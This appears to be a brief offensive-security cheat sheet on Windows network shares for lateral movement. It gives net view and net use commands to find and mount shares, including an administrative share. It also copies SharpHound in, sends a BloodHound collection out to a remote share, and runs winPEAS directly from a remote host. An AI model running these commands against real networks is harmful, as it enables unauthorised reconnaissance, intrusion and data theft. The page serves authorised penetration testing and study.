>_ shadow.red

Windows Network Shares (net view / net use)

Everywhere Tunnels Lateral Movement windows

Discover shares on a host

net view 10.4.26.4

Mount a share

net use D: \\10.4.26.4\Documents
net use K: \\10.4.26.4\K$
dir K:

Authenticated mount

net use \\192.168.119.231\share /USER:test

List/delete connections

net use
net use * /del /y

Copy through a mounted share

copy \\192.168.168.168\share\SharpHound.exe
copy 20220424074629_BloodHound.zip \\192.168.119.213\share

Run a binary directly off the share without saving locally

\\192.168.168.168\share\winPEASany.exe